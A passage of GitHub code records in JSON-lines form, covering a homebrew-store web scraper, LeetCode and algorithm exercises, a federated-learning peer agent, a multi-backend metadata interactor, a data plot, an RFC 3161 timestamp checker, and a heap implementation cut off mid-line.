+{"seq_id":"31521326122","text":"from bs4 import BeautifulSoup\nimport requests\nfrom selenium import webdriver\nimport time\n\n\nclass leagueofbrewers():\n    \"\"\"\n    Scraper for League of Brewers product listings (grain, yeast and hops).\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        Set up the product category URLs and a requests session.\n        \"\"\"\n        self.BASE_URL = 'https://leagueofbrewers.co.nz/homebrew-beer-supplies/beer-brewing-ingredients/'\n        self.grain_url = 'malt-for-making-beer/grain-for-brewing?limit=25'\n        self.liquid_yeast_url = 'beer-brewing-yeast/liquid-yeast-for-beer?limit=25'\n        self.dry_yeast = 'beer-brewing-yeast/dry-yeast-for-beer?limit=25'\n        self.hops_url = 'hops-for-brewing-beer?limit=25'\n        # self.all_urls = [self.hops_url, self.grain_url, self.dry_yeast, self.liquid_yeast_url]\n        self.all_urls = [self.liquid_yeast_url]\n        self.s = requests.session()\n        return\n\n    def update_products(self):\n        \"\"\"\n        Go through all types of products and update the database.\n        :return:\n        \"\"\"\n        for product_url in self.all_urls:\n            entire_page = self._load_entire_page(self.BASE_URL+product_url)\n            details = self._update_single_product(entire_page)\n            self._store(details)\n        return\n\n    def _load_entire_page(self, url):\n        \"\"\"\n        Use a headless Chrome driver to load the page, scroll to trigger the\n        JS-driven loading, then return the resulting html.\n        :return:\n        \"\"\"\n        options = webdriver.ChromeOptions()\n        options.add_argument('headless')\n        driver = webdriver.Chrome(options=options)\n        driver.get(url)\n        ScrollNumber = 20\n        for i in range(1, ScrollNumber):\n            driver.execute_script(\"window.scrollTo(1,50000)\")\n            time.sleep(1)\n        return driver.page_source\n\n    def _parseurl(self, url, sub='get', payload=''):\n        if sub == 'get':\n            r = self.s.get(url, verify=False)\n        else:\n            r = self.s.post(url, data=payload, verify=False)\n        return r\n\n    def _update_single_product(self, html):\n        \"\"\"\n        Works for malt, yeast and hops. Doesn't load the page itself; the\n        caller must supply the fully JS-loaded page source (see\n        _load_entire_page).\n\n        :param html: page source to parse\n        :return:\n        \"\"\"\n        product_details = []\n        soup = BeautifulSoup(html, features=\"html.parser\")\n        for product in soup.findAll(class_='product-image'):\n            product_name = product.img['alt']\n            product_price = product.find(class_='price').text\n            product_link = product.a['href']\n            if product.find(class_='backorder'):\n                product_availability = 0\n            else:\n                product_availability = 1\n            product_details.append((product_name, product_price, product_link, product_availability))\n        return product_details\n\n    def _store(self, deets_array):\n        \"\"\"\n        Store the details of the items.\n        :return:\n        \"\"\"\n        for a in deets_array:\n            for b in a:\n                print(b)\n        print(len(deets_array))\n\n\nif __name__ == '__main__':\n    t = leagueofbrewers()\n    t.update_products()\n","repo_name":"wookienz/homebrewstore","sub_path":"classes/leagueofbrewers.py","file_name":"leagueofbrewers.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
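The _store method above only prints; a hypothetical persistence sketch using sqlite3 from the standard library (the table and column names are assumptions, not part of the scraper):

    import sqlite3

    def store_products(rows, db_path='products.db'):
        # rows: (name, price, link, availability) tuples from _update_single_product
        conn = sqlite3.connect(db_path)
        conn.execute(
            'CREATE TABLE IF NOT EXISTS products '
            '(name TEXT, price TEXT, link TEXT, available INTEGER)'
        )
        conn.executemany('INSERT INTO products VALUES (?, ?, ?, ?)', rows)
        conn.commit()
        conn.close()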
+{"seq_id":"28963843763","text":"import sys\n\n\n# leet code test\ndef find(arr, fee, sA=0):\n if len(arr) == 0: return 0\n bA = -arr[0]\n for i in arr[1:]:\n nBA = max(bA, sA - i)\n nSA = max(sA, bA + i - fee)\n bA = nBA\n sA = nSA\n return sA\n\n\n# result=13\nfee = 3\ninput = [0, 5, 7, 10, 6, 8, 12, 10, 12, 10, 13, 15]\n# result=6\nfee = 3\ninput = [1, 3, 7, 5, 10, 3]\n# result=8\nfee = 2\ninput = [1, 3, 2, 8, 4, 9]\n# result=0\nfee = 3\ninput = [9, 8, 7, 1, 2]\n# result=0\nfee = 0\ninput = [1]\n# result=4\nfee = 1\ninput = [2, 1, 4, 4, 2, 3, 2, 5, 1, 2]\nprint(find(input, fee))\n","repo_name":"PalampurRockstar/Algorithm","sub_path":"src/main/python/algo/medium/BuyAndSellStockInfiniteTransactionEachWithFee.py","file_name":"BuyAndSellStockInfiniteTransactionEachWithFee.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
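An optional self-check collecting the expected results noted in the comments of the script above (assuming find is importable from it):

    cases = [
        (3, [0, 5, 7, 10, 6, 8, 12, 10, 12, 10, 13, 15], 13),
        (3, [1, 3, 7, 5, 10, 3], 6),
        (2, [1, 3, 2, 8, 4, 9], 8),
        (3, [9, 8, 7, 1, 2], 0),
        (0, [1], 0),
        (1, [2, 1, 4, 4, 2, 3, 2, 5, 1, 2], 4),
    ]
    for fee, prices, expected in cases:
        assert find(prices, fee) == expected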
+{"seq_id":"74650609320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef move(n, a, b, c):\n\tprint(\"move({0},{1},{2},{3})\".format(n,a,b,c))\n\tif n == 1:\n\t\tprint(\"move from {0} to {1}\".format(a,c))\n\telse:\n\t\tmove(n-1, a, c, b) # move the top n-1 disks from a to b, using c as the spare\n\t\tmove(1, a, b, c)\n\t\tmove(n-1, b, a, c)\n\nif __name__ == '__main__': \n\tmove(3, 'A', 'B', 'C')","repo_name":"leeliang/python-learning","sub_path":"code/00_Hanoi.py","file_name":"00_Hanoi.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
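The recursion above makes 2**n - 1 single-disk moves; a quick sanity check of that recurrence, assuming nothing beyond the script itself:

    def count_moves(n):
        # T(n) = 2*T(n-1) + 1 with T(1) = 1, which solves to 2**n - 1
        return 1 if n == 1 else 2 * count_moves(n - 1) + 1

    assert count_moves(3) == 2 ** 3 - 1 == 7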
+{"seq_id":"15282632880","text":"from p2p.agents.sync_agent import *\nfrom models.abstract_model import weights_average\nimport numpy as np\n\n# Decentralized federated learning of deep neural networks on non-iid data\n# Authors: Onoszko, Noa\n# Karlsson, Gustav\n# Mogren, Olof\n# Zec, Edvin Listo\n\n\nclass PensAgent(SyncAgent):\n def __init__(self, rounds=100, n_sampled=6, top_m=3, n_peers=3, fixed_comm=False, **kwargs):\n super(PensAgent, self).__init__(**kwargs)\n self.rounds = rounds\n self.n_sampled = n_sampled\n self.top_m = top_m\n self.n_peers = n_peers\n self.fixed_comm = fixed_comm\n self.iteration = 0\n self.selected_peers = {}\n self.new_weights = None\n\n def train_fn(self):\n if self.new_weights is not None:\n self.set_model_weights(self.new_weights)\n self.new_weights = None\n self.iteration += 1\n return super(PensAgent, self).train_fn()\n\n def pull_from_peers(self):\n if self.iteration < self.rounds:\n p = np.arange(self.graph.nodes_num)\n p = p[p != self.id]\n indx = np.random.choice(p, self.n_sampled, replace=False)\n peers = [p for p in self.graph.nodes if p.id in indx]\n # peers = np.random.choice(list(set(self.graph.nodes) - {self}), self.n_sampled, replace=False)\n else:\n expected_samples = (self.top_m / self.graph.nodes_num) * self.rounds\n peers = [k for k, v in self.selected_peers.items() if v > expected_samples]\n indx = np.random.choice(np.array([p.id for p in peers]), self.n_peers, replace=False)\n peers = [p for p in peers if p.id in indx]\n # peers = np.random.choice(peers, size=self.n_peers, replace=False)\n if self.fixed_comm:\n graph_peers = self.graph.get_peers(self.id)\n # If the comm matrix is built, use that peers in fixed communication\n if len(graph_peers) != 0:\n peers = graph_peers\n for peer in peers:\n super(PensAgent, self).receive_message(peer)\n\n if self.iteration < self.rounds:\n saved_models = {self.eval_model_loss(p.model, self.train): p for p in peers}\n peers = list(dict(sorted(saved_models.items())).values())[:self.top_m]\n for peer in peers:\n # We want to receive more messages from this peer so mark as selected peer\n if peer not in self.selected_peers:\n self.selected_peers[peer] = 0\n self.selected_peers[peer] += 1\n\n alphas = [self.train_len] + [peer.train_len for peer in peers]\n ws = [self.get_model_weights()] + [peer.get_model_weights() for peer in peers]\n self.new_weights = weights_average(ws, alphas)\n\n self.hist['selected_peers'] = {p.id: v for p, v in self.selected_peers.items()}\n\n def sync_parameters(self):\n self.pull_from_peers()\n\n def update_parameters(self):\n pass\n","repo_name":"rosaj/p2p_sgd","sub_path":"p2p/agents/pens_agent.py","file_name":"pens_agent.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
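A minimal sketch of what weights_average is assumed to compute here (the real implementation lives in models.abstract_model and is not shown): an alpha-weighted mean of each corresponding weight tensor, with the alphas being the agents' training-set sizes:

    import numpy as np

    def weights_average_sketch(weights_list, alphas):
        # weights_list: one list of per-layer numpy arrays per agent
        total = float(sum(alphas))
        return [
            sum(a * w for a, w in zip(alphas, layer_ws)) / total
            for layer_ws in zip(*weights_list)
        ]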
+{"seq_id":"6232574327","text":"import logging\nfrom abc import abstractmethod\nfrom datetime import datetime\n\nimport gevent\nfrom about_time import about_time\nfrom cached_property import threaded_cached_property\nfrom gevent import Timeout, joinall, killall\n\nfrom metadata.backend.interface import BackendType\nfrom metadata.exc import InteractTimeOut, NotImplementedByBackendError\nfrom metadata.interactor.core import TransactionalOperations\nfrom metadata.interactor.orchestrate import (\n    BatchDGraphOrchestrator,\n    BatchMySQLReplicaOrchestrator,\n    MySQLReplicaOrchestrator,\n    SingleDGraphOrchestrator,\n)\nfrom metadata.interactor.record import LocalRecordsPersistence\nfrom metadata.interactor.transcation import TransactionalDispatchMixIn\nfrom metadata.runtime import rt_context, rt_local, rt_local_manager\nfrom metadata.util.common import StrictABCMeta\nfrom metadata.util.context import inherit_local_ctx\nfrom metadata.util.i18n import selfish as _\n\n\nclass Interactor(object, metaclass=StrictABCMeta):\n    __abstract__ = True\n\n    def __init__(self, backends_in_use, timeout_sec=None, if_recording=True):\n        self.backends_in_use = backends_in_use\n        self.config_collection = rt_context.config_collection\n        self.timeout_sec = (\n            self.config_collection.interactor_config.INTERACTOR_TIMEOUT if not timeout_sec else timeout_sec\n        )\n        self.son_timeout_sec = self.timeout_sec - 5 if self.timeout_sec > 10 else self.timeout_sec\n        self.if_recording = if_recording\n        self.local_persistence = LocalRecordsPersistence()\n        self.transactional_operations = None\n        self.operate_records = None\n        self.batch = False\n        self.transaction_count = 0\n\n        self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n    @threaded_cached_property\n    def sessions(self):\n        \"\"\"\n        The various backend sessions used by this Interactor.\n\n        \"\"\"\n        sessions = {}\n        if self.backends_in_use.get(BackendType.MYSQL, False):\n            sessions[BackendType.MYSQL] = rt_context.mysql_backend.operate_session().session\n        if self.backends_in_use.get(BackendType.DGRAPH, False):\n            sessions[BackendType.DGRAPH] = rt_context.dgraph_backend.operate_session()\n        if self.backends_in_use.get(BackendType.DGRAPH_BACKUP, False):\n            sessions[BackendType.DGRAPH_BACKUP] = rt_context.dgraph_backup_backend.operate_session()\n        if self.backends_in_use.get(BackendType.DGRAPH_COLD, False):\n            sessions[BackendType.DGRAPH_COLD] = rt_context.dgraph_cold_backend.operate_session()\n        db_name = self.backends_in_use.get(BackendType.CONFIG_DB, None)\n        if db_name:\n            sessions[BackendType.CONFIG_DB] = rt_context.biz_mysql_backends[db_name].operate_session().session\n        return sessions\n\n    @abstractmethod\n    def dispatch(self, *args, **kwargs):\n        \"\"\"\n        Perform one complete interaction with the backend(s).\n\n        \"\"\"\n        pass\n\n    @abstractmethod\n    def invoke(self, *args, **kwargs):\n        \"\"\"\n        Execute the data operations. May be called multiple times before committing.\n\n        \"\"\"\n\n    def apply(self, *args, **kwargs):\n        \"\"\"\n        Commit the operation changes.\n\n        \"\"\"\n        self.renew_at_apply_prepare()\n        ret = self.basic_apply()\n        self.renew_at_applied()\n        return ret\n\n    @abstractmethod\n    def basic_apply(self, *args, **kwargs):\n        \"\"\"\n        The core commit operation for the changes.\n\n        \"\"\"\n        pass\n\n    def setup_transactional_operations(self):\n        dispatch_id = getattr(rt_context, 'dispatch_id', None)\n        if dispatch_id:\n            for record in self.operate_records:\n                if not record.operate_id:\n                    record.operate_id = dispatch_id\n            self.transactional_operations = TransactionalOperations(\n                operations=self.operate_records, operate_id=dispatch_id\n            )\n        else:\n            self.transactional_operations = TransactionalOperations(operations=self.operate_records)\n\n    def 
renew_at_apply_prepare(self):\n        check_dict = {}\n        self.logger.info('Transaction with ID {} is preparing to apply.'.format(self.transaction_count))\n        for item in self.operate_records:\n            item.transaction_id = self.transaction_count\n            item_dict = {\n                name: getattr(item, name)\n                for name in dir(item)\n                if not name.startswith('__') and not callable(getattr(item, name))\n            }\n            mysql_table_name = item_dict.get('extra_', {}).get('mysql_table_name', None)\n            if mysql_table_name:\n                if mysql_table_name not in check_dict:\n                    check_dict[mysql_table_name] = []\n                check_dict[mysql_table_name].append(item_dict)\n        try:\n            if not self.check_data_legality(check_dict):\n                self.logger.exception('[check_lineage] Data sync is illegal: {}'.format(check_dict))\n        except Exception as err:\n            self.logger.exception('[check_lineage] lineage check raised an error: {}'.format(err))\n        self.transactional_operations.transaction_id = self.transaction_count\n        self.transactional_operations.state = 'ApplyPrepare'\n        self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n    def renew_at_applied(self):\n        self.logger.info('Transaction with ID {} is applied.'.format(self.transaction_count))\n        self.transactional_operations.apply_time = datetime.now()\n        self.transactional_operations.state = 'Applied'\n        self.local_persistence.save(self.transactional_operations) if self.if_recording else None\n\n    def check_data_legality(self, check_dict):\n        \"\"\"\n        Check that the data being synced is legal.\n        check rules list:\n        1. Watch data_processing_relation writes and verify lineage integrity\n        \"\"\"\n        if 'data_processing_relation' in check_dict and self.backends_in_use.get(BackendType.DGRAPH, False):\n            return rt_context.dgraph_backend.check_lineage_integrity(\n                check_dict['data_processing_relation'], self.sessions[BackendType.DGRAPH]\n            )\n        return True\n\n\nclass SingleInteractor(TransactionalDispatchMixIn, Interactor):\n    \"\"\"\n    An Interactor for use with a single backend only.\n    \"\"\"\n\n    backup_backend_support = True\n\n    def __init__(self, backend_type, *args, **kwargs):\n        if backend_type is BackendType.MYSQL:\n            raise NotImplementedByBackendError(_('Edit function is not enabled in MySQL backend.'))\n        self.backend_type = backend_type\n        super(SingleInteractor, self).__init__(backends_in_use={self.backend_type: True}, *args, **kwargs)\n        self.backend_session = self.sessions[self.backend_type]\n\n    def dispatch(self, operate_records, batch=False):\n        self.operate_records = operate_records\n        self.batch = batch\n        self.setup_transactional_operations()\n        self.local_persistence.save(self.transactional_operations)\n        with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n            with self.backend_session:\n                self.transactional_inner_dispatch()\n\n    def invoke(self):\n        setattr(rt_local, '{}_session_now'.format(self.backend_type.raw.value), self.backend_session)\n        b = (\n            BatchDGraphOrchestrator(backend_session=self.backend_session)\n            if self.batch\n            else SingleDGraphOrchestrator(backend_session=self.backend_session)\n        )\n        b.dispatch(self.operate_records)\n\n    def basic_apply(self):\n        ret = self.backend_session.commit()\n        del self.sessions\n        return ret\n\n\nclass ParallelInteractor(TransactionalDispatchMixIn, Interactor):\n    \"\"\"\n    An Interactor that dispatches to multiple backends concurrently.\n    \"\"\"\n\n    backup_backend_support = False\n\n    def __init__(self, *args, **kwargs):\n        super(ParallelInteractor, self).__init__(*args, **kwargs)\n        self.available_backends = self.backends_in_use\n        self.metric_store = {}\n        self.mysql_gl, self.dgraph_gl, self.config_db_gl = None, None, None\n        self.invoking_greenlets = []\n        
self.record_keys_lst = None\n\n    def dispatch(self, operate_records, batch):\n        self.operate_records = operate_records\n        self.batch = batch\n        self.setup_transactional_operations()\n        self.local_persistence.save(self.transactional_operations)\n        self.record_keys_lst = [item.operate_id if item.operate_id else item for item in operate_records]\n        with Timeout(self.timeout_sec, InteractTimeOut(_('dispatch timeout in {}.').format(self.timeout_sec))):\n            try:\n                # For every enabled backend, hold its transaction and run the data interaction\n                for k, v in list(self.sessions.items()):\n                    v.__enter__()\n                self.transactional_inner_dispatch()\n            finally:\n                # Whatever happened, the child sync greenlets must be finished when this call returns.\n                killall(self.invoking_greenlets)\n                for k, v in list(self.sessions.items()):\n                    v.__exit__(None, None, None)\n\n    def invoke(self):\n        self.invoking_greenlets = []\n        if self.available_backends.get(BackendType.CONFIG_DB):\n            g = gevent.spawn(inherit_local_ctx(self.renew_config_db, rt_local, rt_local_manager))\n            self.invoking_greenlets.append(g)\n        if self.available_backends.get(BackendType.MYSQL):\n            g = gevent.spawn(inherit_local_ctx(self.interact_with_mysql, rt_local, rt_local_manager))\n            self.invoking_greenlets.append(g)\n        if self.available_backends.get(BackendType.DGRAPH):\n            g = gevent.spawn(inherit_local_ctx(self.interact_with_dgraph, rt_local, rt_local_manager))\n            self.invoking_greenlets.append(g)\n        joinall(self.invoking_greenlets, raise_error=False)\n        for item in self.invoking_greenlets:\n            if not item.successful():\n                item._raise_exception()\n\n    def basic_apply(self):\n        self.logger.info('sessions_this_time is {}'.format(self.sessions))\n        if self.available_backends.get(BackendType.DGRAPH):\n            with about_time() as t:\n                self.sessions[BackendType.DGRAPH].commit()\n            self.commit_metric(t, BackendType.DGRAPH.value)\n\n        if self.available_backends.get(BackendType.CONFIG_DB, False):\n            with about_time() as t:\n                self.sessions[BackendType.CONFIG_DB].commit()\n            self.commit_metric(t, BackendType.CONFIG_DB.value)\n\n        if self.available_backends.get(BackendType.MYSQL, False):\n            with about_time() as t:\n                self.sessions[BackendType.MYSQL].commit()\n            self.commit_metric(t, BackendType.MYSQL.value)\n\n        del self.sessions\n\n    def commit_metric(self, t, session_type):\n        \"\"\"\n        Record commit statistics.\n\n        :param t: elapsed-time measurement\n        :param session_type: session type\n        :return:\n        \"\"\"\n        self.logger.info(\n            {\n                'session_type': '{}'.format(session_type),\n                'metric_type': 'session_commit',\n                'elapsed_time': t.duration,\n                'invoke_elapsed_time': self.metric_store.get('{}_invoke_elapsed_time'.format(session_type), 0.0),\n                'operate_ids': self.metric_store.get('{}_operate_ids'.format(session_type), []),\n            },\n            extra={'output_metric': True},\n        )\n\n    def interact_with_mysql(\n        self,\n    ):\n        \"\"\"\n        Interact with MySQL\n\n        :return:\n        \"\"\"\n        with Timeout(\n            self.son_timeout_sec, InteractTimeOut(_('mysql interact timeout in {}.').format(self.son_timeout_sec))\n        ):\n            rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.MYSQL]\n            mysql_b = (\n                BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n                if self.batch\n                else MySQLReplicaOrchestrator(backend_session=mysql_session)\n            )\n            with about_time() as t:\n                mysql_b.dispatch(self.operate_records)\n            self.sync_metric(self.record_keys_lst, 'mysql', 'interactor_dispatch', t, self.metric_store)\n\n    def interact_with_dgraph(self):\n        \"\"\"\n        Interact with Dgraph\n\n        :return:\n        \"\"\"\n        with Timeout(\n            self.son_timeout_sec, InteractTimeOut(_('dgraph interact timeout in {}.').format(self.son_timeout_sec))\n        ):\n            rt_local.dgraph_session_now = dgraph_session = 
self.sessions[BackendType.DGRAPH]\n dgraph_b = (\n BatchDGraphOrchestrator(backend_session=dgraph_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=dgraph_session)\n )\n with about_time() as t:\n dgraph_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'dgraph', 'interactor_dispatch', t, self.metric_store)\n\n def renew_config_db(\n self,\n ):\n \"\"\"\n Interact with ConfigDB\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('config_db interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.CONFIG_DB]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'config_db', 'interactor_dispatch', t, self.metric_store)\n\n def sync_metric(self, record_id_lst, backend_type, metric_type, cost, metric_store=None):\n if metric_store is not None:\n metric_store['{}_invoke_elapsed_time'.format(backend_type)] = cost.duration\n metric_store['{}_operate_ids'.format(backend_type)] = record_id_lst\n self.logger.info(\n {\n 'record_ids': record_id_lst,\n 'backend_type': backend_type,\n 'metric_type': metric_type,\n 'elapsed_time': cost.duration,\n },\n extra={'output_metric': True},\n )\n","repo_name":"Tencent/bk-base","sub_path":"src/datamgr/metadata/metadata/interactor/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"}
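A toy distillation of the fan-out pattern ParallelInteractor.invoke uses above: spawn one greenlet per task, join them without raising, then surface the first failure. The names here are illustrative, not part of the module:

    import gevent
    from gevent import joinall

    def run_parallel(tasks):
        greenlets = [gevent.spawn(t) for t in tasks]
        joinall(greenlets, raise_error=False)  # let every task finish or fail
        for g in greenlets:
            if not g.successful():
                raise g.exception  # re-raise the first recorded failure
        return [g.value for g in greenlets]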
+{"seq_id":"38927412600","text":"#\r\n# @lc app=leetcode id=211 lang=python3\r\n#\r\n# [211] Design Add and Search Words Data Structure\r\n#\r\n\r\n# @lc code=start\r\n\r\nclass TrieNode():\r\n\r\n def __init__(self):\r\n self.children = [None] * 128\r\n self.end = False\r\n\r\n def set_char(self, char):\r\n index = ord(char)\r\n node = TrieNode()\r\n self.children[index] = node\r\n return node\r\n\r\n def get_child(self, char):\r\n index = ord(char)\r\n return self.children[index]\r\n\r\n\r\nclass Trie:\r\n \"\"\"\r\n noob implement\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.root = TrieNode()\r\n\r\n def insert(self, word: str) -> None:\r\n \"\"\"\r\n Inserts a word into the trie.\r\n \"\"\"\r\n head = self.root\r\n for w in word:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n head = head.set_char(w)\r\n head.end = True\r\n\r\n def search(self, root, word: str, index) -> bool:\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n \"\"\"\r\n print(word[index:])\r\n if index == len(word):\r\n return root.end\r\n\r\n head = root\r\n for i in range(index, len(word)):\r\n w = word[i]\r\n if w == \".\":\r\n for c in head.children:\r\n if c and self.search(c, word, i+1):\r\n return True\r\n return False\r\n else:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return head.end\r\n\r\n def startsWith(self, prefix: str) -> bool:\r\n \"\"\"\r\n Returns if there is any word in the trie that starts with the given prefix.\r\n \"\"\"\r\n head = self.root\r\n for w in prefix:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return True\r\n\r\n\r\nclass WordDictionary:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.trie = Trie()\r\n\r\n def addWord(self, word: str) -> None:\r\n \"\"\"\r\n Adds a word into the data structure.\r\n \"\"\"\r\n self.trie.insert(word)\r\n\r\n def search(self, word: str) -> bool:\r\n \"\"\"\r\n Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\r\n \"\"\"\r\n return self.trie.search(self.trie.root, word, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = WordDictionary()\r\n s.addWord(\"bad\")\r\n print(s.search(\"b.d\"))\r\n\r\n# Your WordDictionary object will be instantiated and called as such:\r\n# obj = WordDictionary()\r\n# obj.addWord(word)\r\n# param_2 = obj.search(word)\r\n# @lc code=end\r\n","repo_name":"huhudev-git/leetcode","sub_path":"211.design-add-and-search-words-data-structure.py","file_name":"211.design-add-and-search-words-data-structure.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
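Usage mirroring the LeetCode 211 example (note that search(), as written, also prints its trace to stdout):

    d = WordDictionary()
    for w in ('bad', 'dad', 'mad'):
        d.addWord(w)
    assert d.search('pad') is False
    assert d.search('bad') is True
    assert d.search('.ad') is True
    assert d.search('b..') is True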
+{"seq_id":"39108269451","text":"import matplotlib.pyplot as plt\r\nimport csv, random\r\n\r\nfilename = 'aboration_rate.csv'\r\nwith open(filename) as f:\r\n    reader = csv.reader(f)\r\n    header_row = next(reader)\r\n\r\n    for index, data in enumerate(header_row):\r\n        print(index, data)\r\n\r\n    abortion, ages, period = [], [], []\r\n\r\n    for row in reader:\r\n        period.append(row[0])\r\n        abortion.append(float(row[2]))\r\n        ages.append(row[1])\r\n\r\nfig = plt.figure(dpi=128)\r\ncolors = ['red', 'blue', 'green', 'lightblue', 'yellow', 'darkgreen', 'darkblue', 'violet']\r\nx = 0\r\ny = 8\r\nyear = 2000\r\nfor i in range(19):\r\n    plt.plot(ages[x:y], abortion[x:y], c=random.choice(colors), label=str(year))\r\n    x += 8\r\n    y += 8\r\n    year += 1\r\n\r\nplt.title(\"Abortion rate from 2000 to 2018\", fontsize=24)\r\nplt.xlabel(\"Women's age\", fontsize=14)\r\nplt.ylabel(\"Abortion rate\", fontsize=14)\r\nplt.tick_params(axis='both', labelsize=14)\r\nfig.autofmt_xdate()\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"AliAhmed15245/Data-visualiztion-python","sub_path":"csv files visualization/aboration_rate.py","file_name":"aboration_rate.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
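A sketch of one way to give the 19 series distinct, stable colors: sample a qualitative colormap instead of random.choice. It assumes the same ages/abortion lists and 8-rows-per-year slicing as the script above:

    from matplotlib import cm

    cmap = cm.get_cmap('tab20', 19)
    for i in range(19):
        lo, hi = i * 8, i * 8 + 8
        plt.plot(ages[lo:hi], abortion[lo:hi], c=cmap(i), label=str(2000 + i))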
+{"seq_id":"3824225489","text":"\"\"\"\nModule to confirm the integrity of the timestamped document\n\"\"\"\nfrom pyasn1.type import univ\nfrom pyasn1.codec.der import decoder\nimport hashlib\nfrom rfc3161 import TimeStampResp, TSTInfo\n\nTSR_FILE = 'READ_ME__txt.tsr'\nFILE = 'READ_ME_.txt'\n\ndigest_algorithms = {\n univ.ObjectIdentifier('1.3.14.3.2.26'): 'sha1',\n univ.ObjectIdentifier('1.2.840.113549.2.5'): 'md5',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.1'): 'sha256',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.2'): 'sha384',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.3'): 'sha512'\n}\n\n\ndef main(tsr: str, file: str):\n \"\"\"\n :param tsr: Verified timestamp response filepath\n :param file: Original document path\n :return:\n \"\"\"\n print('Confirming the integrity of original document...')\n try:\n response, _ = decoder.decode(open(tsr, 'rb').read(), asn1Spec=TimeStampResp())\n\n e_content = response['timeStampToken']['content']['encapContentInfo']['eContent']\n tst_info, _ = decoder.decode(e_content, asn1Spec=TSTInfo())\n\n if tst_info['messageImprint']['hashAlgorithm']['algorithm'] in digest_algorithms:\n hash_str = digest_algorithms.get(tst_info['messageImprint']['hashAlgorithm']['algorithm'])\n else:\n print(f'The hash algorithm is not listed', str(tst_info['messageImprint']['hashAlgorithm']['algorithm']))\n return False\n\n hash_tst = tst_info['messageImprint']['hashedMessage']\n\n hash_obj = hashlib.new(hash_str)\n\n with open(file, 'rb') as doc:\n hash_obj.update(doc.read())\n\n print('TSTInfo hashedMessage: ', hash_tst.asOctets().hex())\n print('Hash of original file: ', hash_obj.digest().hex())\n\n assert hash_tst.asOctets() == hash_obj.digest()\n return True\n except Exception as e:\n print('The file has changed since the date in TSTInfo', e)\n\n return False\n\n\nif __name__ == '__main__':\n main(TSR_FILE, FILE)\n","repo_name":"NuqieNoila/dts_client","sub_path":"confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
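The same verification can be cross-checked with the openssl CLI, assuming the TSA's CA certificate bundle is available locally (cacert.pem is a placeholder name):

    openssl ts -verify -data READ_ME_.txt -in READ_ME__txt.tsr -CAfile cacert.pem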
+{"seq_id":"70114487401","text":"#\n# https://leetcode.com/explore/learn/card/heap/643/heap/4017/\n#\n#\n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n \"date\": \"2022/10/4\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"?? ms\",\n \"fasterThan\": \"\",\n \"memory\": \"?? MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\n\"\"\"\n 0\n 1 2\n 3 4 5 6\n\"\"\"\n\ndef parent(i):\n if i % 2 == 0:\n return (i - 1) // 2\n else:\n return i // 2\n\ndef left(i):\n return i * 2 + 1\n\ndef right(i):\n return (i + 1) * 2 \n\n\"\"\"\n 3 1 \n 1 ---> 3 \n\"\"\"\n\ndef heapify(a):\n n = len(a)\n i = n - 1\n while True:\n if i == 0:\n break\n\n if a[i] < a[parent(i)]:\n swap(a, i, parent(i))\n i = parent(i)\n else:\n break\n\ndef swap(a, i, j):\n a[i], a[j] = a[j], a[i] \n\n'''\n 10 10 10\n 3 5 3 20 5 3 \n'''\ndef down_heapify(a):\n n = len(a)\n i = 0 \n while True:\n idx = None \n if left(i) <= n - 1:\n if a[left(i)] < a[i]:\n idx = left(i)\n\n if right(i) <= n - 1:\n if a[right(i)] < a[i]:\n if idx == None:\n idx = right(i)\n else:\n if a[right(i)] < a[idx]:\n idx = right(i)\n\n if idx == None:\n break\n\n swap(a, idx, i)\n i = 